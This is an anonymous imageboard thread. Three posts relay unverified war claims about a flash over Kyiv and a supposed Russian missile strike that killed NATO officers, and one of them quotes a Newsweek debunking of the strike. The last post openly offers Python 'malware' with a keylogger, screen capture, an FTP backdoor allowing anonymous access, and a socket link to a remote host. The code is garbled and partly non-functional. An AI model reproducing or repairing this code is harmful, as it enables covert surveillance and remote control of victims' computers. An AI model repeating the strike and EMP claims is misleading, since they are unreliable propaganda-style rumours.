Anonymous ID: 8113e8 April 20, 2023, 10:47 a.m. No.18725149   🗄️.is 🔗kun   >>5230 >>5688 >>5709 >>5762 >>5786

>>18725082

NASA DENIES FLASH OVER KIEV DUE TO DEORBITING SATELLITE - RUSSIAN EMP WARNING?

 

Last evening at around 10:00 pm local time (19:00 GMT), while Defense Minister Shoigu was with the Strategic Missile Forces, a blinding flash detonated over the Ukrainian capitol city of Kiev—a blinding flash Ukraine first blamed on a falling NASA satellite, but NASA quickly denied this claim—Ukraine President Vladimir Zelensky’s chief of staff Andrey Yermak wrote on social media that the flashes in the sky were the work of Ukrainian air defenses, but later deleted the message—then the Ukraine Space Agency reported: “The blinding flash was probably related to a cosmic body entering the dense layers of the atmosphere”.

 

Executive Director Dr. Peter Vincent Pry in his warning “RUSSIA: EMP THREAT” document factually states: “Russia probably remains the world’s leader in Non-Nuclear EMP (NNEMP) weapons, more commonly called Radio-Frequency Weapons (RFWs)” and adds: “Russian development of hypersonic missile warheads is a dangerous new dimension of the nuclear and HEMP threat…Great speed (Mach 20, twenty times the speed of sound) and flying a flat trajectory, skimming along the top of the upper atmosphere, significantly reduces visibility to U.S. early-warning satellites and radars, while also reducing arrival time”—and in knowing the power of Russia combining non-nuclear Super-EMP weapons with unstoppable hypersonic missiles, Executive Director Dr. Peter Vincent Pry warned during a recent interview that President Putin wouldn’t have any fear of unleashing them against Ukraine because they can’t be called a nuclear first strike.

 

https://www.rferl.org/a/ukraine-kyiv-flash-light-nasa-satellite/32371589.html/

https://www.theguardian.com/world/2023/apr/19/flash-in-sky-over-kyiv-caused-by-satellite-reentering-atmosphere

https://www.rt.com/russia/575045-nasa-ukraine-satellite-kiev/

https://news.yahoo.com/nasa-says-flash-over-kyiv-233145760.html?guccounter=1

https://apps.dtic.mil/sti/pdfs/AD1124730.pdf

Anonymous ID: 8113e8 April 20, 2023, 10:54 a.m. No.18725169   🗄️.is 🔗kun   >>5192 >>5684 >>5688 >>5713 >>5762 >>5786

>>18725082

Horrific Slaughter: Russia Finally Admits to Destroying NATO’s Deep Underground Command Bunker in Kiev

 

As reported on March 12 by the Greek portal of political and military information Pronews, citing American sources, in the course of an operation to retaliate for a provocation in the Bryansk region, a Russian hypersonic missile “Dagger” struck at a joint Ukrainian-NATO command and communications center.

 

According to Pronews , “dozens of NATO officers” were killed in a “terrifying strike” by a Mach 12 missile. In all likelihood, we are talking about the defeat of the “shadow General Staff” of NATO in Ukraine. The secret underground bunker, built at a depth of 400 feet (120 meters), housed several NATO officers (retired) and advisers. In total, more than 300 people. To date, according to the portal, 40 people have been pulled out from under the rubble of the underground headquarters, but most of those who died under the rubble have not yet been found.

 

https://www.theinteldrop.org/2023/03/14/horrific-slaughter-russia-finally-admits-to-destroying-natos-deep-underground-command-bunker-in-kiev/

Anonymous ID: 8113e8 April 20, 2023, 11 a.m. No.18725192   🗄️.is 🔗kun   >>5224 >>5688 >>5762 >>5786

>>18725082

>>18725169 (me)

 

Did Russian Kinzhal Missile Take Out 'NATO Command Center' in Ukraine?

 

Russian precision strike supposedly destroyed an underground "NATO command center" in Ukraine earlier this month, with "dozens" of Western officers and military personnel purportedly killed in the "Kinzhal" (or "Dagger) missile attack.

 

At least, that is the claim circulating on some social media channels, including those known for spreading pro-Kremlin talking points and Russian propaganda.

 

In some cases the claim was supported by a photo of the supposed strike site, showing large-scale devastation and a burned-down building.

 

Newsweek Newsletter sign-up >

 

But is there any factual basis to the claim? Newsweek Misinformation Watch pulled at the threads—and found that most of the elements and sources contained in the claim do not stand up to scrutiny.

 

Several Twitter and Telegram posts, totaling hundreds of thousands of views in late March 2023, purported that a NATO HQ in Ukraine was destroyed, with "up to 300 people" killed in the strike.

 

"A terrifying strike of the Russian supersonic missile 'Dagger' at a depth of 130 meters on the NATO command center in Ukraine!": Greek Pronews writes about the huge losses among NATO officers as a result of the missile attack," one post read.

 

“A terrifying strike of the Russian supersonic missile “Dagger” at a depth of 130 meters on the NATO command center in Ukraine!”: Greek Pronews writes about the huge losses among NATO officers as a result of the missile attack.

“The Russian hypersonic https://t.co/3YIUfTWH29… pic.twitter.com/FJUHp0tudk

— Victor vicktop55 (@vicktop55) March 30, 2023

 

https://www.newsweek.com/russia-nato-ukraine-command-center-strike-kinzhal-missile-1791805

 

more Americans are becoming aware of these claims from the just released video “Putin just DESTROYED NATO'S top Ukraine leaders with this attack, U.S. is silent” (information starts at 33:06 time mark in the video posted below)

Anonymous ID: 8113e8 April 20, 2023, 11:14 a.m. No.18725261   🗄️.is 🔗kun

>>18725082

HACKING FOR AMATEURS???

 

Designed by E

-

This novel code is designed to secretly take control of a victim's computer and steal private information. It does this by using several techniques, such as capturing screenshots of the victim's computer screen, logging their keystrokes, and creating a "backdoor" in the victim's computer, which can be used to remotely control and access their system. This "backdoor" is essentially a secret passage that can bypass normal security measures and allow the attacker to access the victim's system from a remote location. To do all of this more securely, the code uses encryption to hide the attacker's activities from being detected by the victim or security systems.

 

Cryptic Raider Malware By E:

`

import socket

import os

import sys

import ssl

import urllib.request

 

def encrypt_data(data, key):

# AES-256 encryption using PyCryptoDome library

from Crypto.Cipher import AES

import base64

 

BLOCK_SIZE = 16

PADDING = '{'

pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING

 

iv = os.urandom(16)

cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, iv=iv)

encrypted_data = base64.b64encode(iv + cipher.encrypt(pad(data).encode('utf8')))

 

return encrypted_data.decode('utf8')

 

def start_capture():

# Screen capture using PyAutoGUI library

import pyautogui

 

pyautogui.screenshot()

return

 

def start_keylogger():

# Keylogging using PyHook3 and pythoncom libraries

import pyHook3

import pythoncom

 

def OnKeyboardEvent(event):

with open('keylogs.txt', 'a') as f:

f.write(event.Key)

f.close()

return True

 

hooks_manager = pyHook3.HookManager()

hooks_manager.KeyDown = OnKeyboardEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()

return

 

def start_backdoor(remote_host_ip, ftp_user, ftp_password):

# Backdoor using PyInstaller and PyFTPDlib libraries

import pyftpdlib.authorizers as authorizers

import pyftpdlib.handlers as handlers

import pyftpdlib.servers as servers

import socketserver

import threading

import time

 

# Directory to place FTP server content

FTP_DIR = 'backdoor_content'

def create_ftp_server():

# Create FTP server with file authorizer

authorizer = authorizers.DummyAuthorizer()

authorizer.add_user(ftp_user, ftp_password, FTP_DIR, perm='elradfmwMT')

authorizer.add_anonymous(os.getcwd())

 

# Define FTP handler and server

handler = handlers.FTPHandler

handler.authorizer = authorizer

handler.banner = "Welcome to the backdoor FTP server"

 

server = servers.FTPServer(('0.0.0.0', 21), handler)

 

# Start server with separate thread

server_thread = threading.Thread(target=server.serve_forever)

server_thread.daemon = True

server_thread.start()

 

# Wait for server to start up

while not server.is_alive():

time.sleep(1)

 

print(f'Backdoor FTP server started at {remote_host_ip}:21')

return

 

def backdoor():

# Create FTP server

create_ftp_server()

# Connect to remote host

client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

client_sock.connect((remote_host_ip, 443))

# Wrap socket with SSL/TLS

ssl_sock = ssl.wrap_socket(client_sock)

 

# Send encrypted data over SSL/TLS connection

while True:

data = input('Enter command: ')

encrypted_data = encrypt_data(data, key)

ssl_sock.send(encrypted_data.encode('utf8'))

 

# Receive and print decrypted response

response = ssl_sock.recv(1024)

print(response.decode('utf8'))

 

# Clean up SSL/TLS connection

ssl_sock.close()

return

 

# Start backdoor attack

key = os.urandom(32).hex()

backdoor_thread = threading.Thread(target=backdoor)

backdoor_thread.start()

 

# Start screen capture and keylogger

start_capture()

start_keylogger()

return

 

# Example usage with remote IP, FTP credentials, and encryption key

remote_host_ip = '192.168.1.100'

ftp_user = 'ftp_username'

ftp_password = 'ftp_password'

key = 'encryption_key'

start_backdoor(remote_host_ip, ftp_user, ftp_password, key)

 

https://t.me/s/TheOfficialE